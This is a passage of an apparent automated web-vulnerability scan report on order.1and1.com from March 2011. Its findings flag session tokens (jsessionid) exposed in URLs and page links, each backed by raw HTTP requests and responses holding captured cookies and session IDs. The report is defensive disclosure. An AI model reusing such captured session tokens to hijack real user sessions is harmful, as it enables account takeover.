GET /xml/order/FirstWebsite;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FirstWebsite?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.69. http://order.1and1.com/xml/order/Gtc

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; note that the server answered with a 301 whose Location omits the token:

Request

GET /xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Gtc?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tandc
Content-Length: 0
Connection: close
Content-Type: text/plain


3.70. http://order.1and1.com/xml/order/Home

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The URL in the request carries a session token, here as a ;jsessionid= path parameter rather than a query-string value. A token in the URL is exposed to proxy and server logs, browser history and the Referer header sent to any linked site; here the server accepted the request and served the page (200):

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.71. http://order.1and1.com/xml/order/Home

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The response rewrites the session token into the following links (the ;jsessionid= path parameter is appended to every navigation URL), so the token propagates to each subsequent request and to any link that is copied, bookmarked or shared:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li class="tabs-home"><a style="background:none;" class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.customerlogin&amp;site=CC.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.nav.customerlogin" rel="redirectlink-hd-nav-customerlogin">
Customer Login
</a>
...[SNIP]...
<li class="tabs-home"><a class="core_button_normal" href="/xml/order/Contact;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.support" rel="button-hd-nav-support">Support</a>
...[SNIP]...
</table><a class="teaserlink" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/free_6mounths.png" alt="Web Hosting" class="alphapng hostingbox price-stopper-countdown" width="193" height="121"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=weiter" rel="button-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/pr_9_99_diy_free_trial.png" alt="FREE TRIAL then starting at $ 9.99/month" class="alphapng pos-price-doityourself price-stopper" width="89" height="95"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"></a>
...[SNIP]...
<div id="navigation" class="homepos"><a class="core_button_normal" href="/xml/order/sitedesign;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><img src="/oneandone_en_common/img/pages/Home/teaser_sitedesign.png" alt="" class="alphapng teaser-sitedesign" width="186" height="191">
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.mybusinesssite&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=hd.nav.mybusinesssite" rel="redirectlink-hd-nav-mybusinesssite">MyBusiness Site</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Domains</a></li><li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft Hosting</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft&reg; Exchange</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Dynamic Cloud Server</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Virtual Servers</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft&reg; SharePoint&reg;</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">eShops</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<li>Choose between <a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">virtual</a> or <a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">dedicated servers</a><br>and <a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">dynamic cloud servers</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a rel="height=690, width=737" class="window-open" href="/xml/order/popupWebsiteMagazine;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p><a class="nounderline" href="/links;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">1and1.com</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.72. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.73. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
